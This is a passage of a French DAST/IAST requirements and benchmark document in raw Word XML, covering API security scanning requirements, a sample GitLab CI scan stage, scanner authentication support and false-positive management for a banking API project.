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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PSC26 – Contrôles Sécurité APIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Benchmark DAST / IAST – Exigences, analyse technique et prérequis d’intégration GitLab CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce document définit les exigences fonctionnelles, techniques et d’intégration pour la sélection et le déploiement d’une solution DAST/IAST dans le cadre du projet PSC26 (Contrôles Sécurité APIs). Il intègre l’analyse technique détaillée des deux modes DAST (CI/CD via plugin et On-Demand), les exigences IAST multi-langages, la gestion des faux positifs, la personnalisation des rapports, et les prérequis d’intégration GitLab. Il s’appuie sur le DEB_SécuAPI et les obligations réglementaires DORA RTS / PTS MIA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:fill="1F4E79" w:val="clear"/>
        <w:spacing w:after="200" w:before="440"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3   Exigences Fonctionnelles</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3.1   Périmètre fonctionnel couvert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La solution doit couvrir l’ensemble du cycle de vie des APIs sur le périmètre gLBP, depuis leur développement (BUILD) jusqu’à leur exploitation en production (RUN), quel que soit le langage ou le framework utilisé.</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4300"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1566"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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Intitulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Priorité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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Réf. DORA/PTS</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EF-01</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Découverte &amp; cartographie API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Découverte automatique des APIs (REST, SOAP, GraphQL, gRPC, WebSocket) incluant shadow/zombie/rogue. Alimentation du catalogue API Authority.</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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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RTS 11.2.B</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Scan DAST automatisé CI/CD</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Scan DAST intégré dans le pipeline GitLab sur env. staging/intégration. Coverage OWASP API Top10:2023 complet. Gate bloquant sur CRITICAL.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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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RTS 10.2.A/B</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EF-03</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Scan DAST On-Demand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Scan planifié ou manuel sur preprod/production. Mode passif + actif limité. Rapport asynchrone vers CSIRT/RSSI. Scans hebdomadaires FCI.</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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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RTS 10.2.B</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EF-04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IAST multi-langages</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Instrumentation IAST en phase de test (BUILD) sans modification du code source. Support Java, Python, Node.js, .NET, Go, PHP. Taint tracking complet.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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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RTS 10.2.A</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EF-05</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Contrôles durcissement API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Vérification des configurations sécurité : headers, TLS, authentification, exposition données sensibles. Alignement PTS-MIA-PR-HARDEN.</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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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PTS-MIA-PR-HARDEN / RTS 10.4.D</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EF-06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Gestion faux positifs persistante</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Requalification des findings (Confirmed/FP/Accepted Risk/Fixed). Persistance entre scans. Baseline Git des FP connus. Règles d’exclusion configurables.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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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RTS 10.2.B</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EF-07</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Rapports personnalisables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Templates rapport : SARIF, JSON, HTML/PDF. Filtrage par sévérité. Rapport différentiel. Logo, classification C2 Restreint, contexte projet.</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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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DICT C:3</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EF-08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Alimentation VOC / KPI MCS</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Export vers VOC (CVSS, KEV, EPSS, TRS). Indicateurs : nb vulns, sévérité, taux FP, points de contrôle. Dashboard GitLab Security.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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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RTS 2.2.C</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EF-09</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Fiabilisation catalogue API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Contribution à l’inventaire API Authority (flux nouveaux projets + stock existant). Détection APIs non référencées.</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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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RTS 8.6 / 11.2.B</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Traçabilité &amp; auditabilité</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Journalisation horodatée de toutes les actions de scan. Retention 1 an. Export audit CSIRT. Lien commit SHA / pipeline GitLab.</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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DICT T:3 / DORA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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4   DAST en CI/CD via Plugin — Analyse Technique Détaillée</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4.1   Environnement cible et positionnement dans le pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le DAST CI/CD s’applique exclusivement aux environnements dynamiques déployés : intégration et staging. L’application doit être déployée et accessible sur un endpoint HTTP/HTTPS avant le démarrage du scan. La production est exclue de ce mode.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4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE5CD"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Contrainte critique : ne jamais lancer un scan DAST actif en production. Risque de DoS applicatif, pollution des données métier, déclenchement des systèmes de détection (WAF, IPS) avec impact sur la disponibilité.</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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">stages:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - .pre             # vérification conformité pipeline (inclusion template sécurité)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - build            # compilation, packaging</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - deploy-staging   # déploiement OBLIGATOIRE avant scan</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - security-dast    # scan DAST sur l’env déployé</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - publish-report   # SARIF → GitLab Dashboard + VOC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">dast-scan:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: security-dast</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  image: &lt;image-scanner&gt;:latest</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  timeout: 20 minutes          # timeout strict — ne jamais bloquer le pipeline indéfiniment</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_TARGET_URL: $CI_ENVIRONMENT_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_API_SPEC: openapi.yaml           # coverage-driven si spec disponible</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_AUTH_TOKEN: $DAST_SECRET_TOKEN   # variable protégée/masquée</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_SEVERITY_THRESHOLD: CRITICAL      # bloquant si CRITICAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_RATE_LIMIT: 20                    # req/s max</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  artifacts:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    reports:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      dast: dast-report.sarif</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    expire_in: 90 days</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  needs: [deploy-staging]      # dépendance explicite</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4.2   Ce que le plugin DAST doit pouvoir faire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.1   Découverte &amp; crawling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode coverage-driven (OpenAPI/Swagger) : le scanner parcourt tous les endpoints décrits dans la spéc — mode le plus fiable et le plus rapide pour les APIs REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode active scan : crawl automatique sans spec, pour les APIs sans documentation — couverture moindre mais utile pour la détection d’endpoints non documentés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HAR replay : enregistrement du trafic applicatif réel (via proxy) et rejeu en mode attaque — indispensable pour les APIs avec flux complexes, sessions, ou workflows multi-étapes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Support multi-formats : OpenAPI 2.x / 3.x, GraphQL SDL, WSDL (SOAP), AsyncAPI (WebSocket/MQTT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.2   Authentification — point critique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L’authentification est le point d’échec n°1 des DAST mal configurés. Un scanner non authentifié ne teste que la surface publique et manque la majorité des vulnérabilités métier.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000"/>
        <w:gridCol w:w="3226"/>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Mécanisme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technique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Exigence</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Risque si absent</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OAuth2 / OIDC</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Client credentials (M2M) et Authorization code (user-facing). Token refresh automatique pendant le scan (les scans &gt; durée du token échouent silencieusement).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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50% des endpoints non testés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Bearer JWT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Injection header Authorization: Bearer &lt;token&gt;. Renouvellement automatisé via endpoint configurable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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3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Scan partiel sans alerte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 Key</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Injection header (X-API-Key) ou query param. Plusieurs clés simultanées pour tester différents niveaux de privilège.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Surface réduite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mTLS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Certificat client configurable (PEM/PKCS12). Nécessaire pour les APIs bancaires inter-systèmes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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APIs métier non testées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Basic Auth</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Simple, encore présent sur des composants internes ou legacy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Couverture partielle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Session cookie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Pour les applications web legacy avec authentification form-based.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Apps legacy exclues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SAML / SSO</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Authentification fédérée (PingFederate). Gestion du flux de redirection SAML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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SSO non couvert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C1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC"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Exigence critique : le plugin doit gérer le token refresh mid-scan. Un scan DAST complet dure 15–60 min. Un JWT de 15 min invalide la moitié du scan sans remonter d’erreur explicite dans le pipeline — les vulnérabilités des endpoints protégés sont silencieusement ignorées.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.3   Personnalisation des règles de détection &amp; gestion des faux positifs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C’est le critère de maturité différenciant entre les outils. Un DAST sans gestion des FP persistante est inutilisable sur un pipeline récurrent car les mêmes FP remontent à chaque exécution et noient les vrais findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusions configurables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion par pattern d’endpoint : exclure `/actuator/*`, `/health`, `/swagger-ui`, `/metrics` — génèrent du bruit sans valeur sécurité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion par type de vulnérabilité : désactiver les checks XSS sur une API pure JSON (qui ne retourne jamais de HTML)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
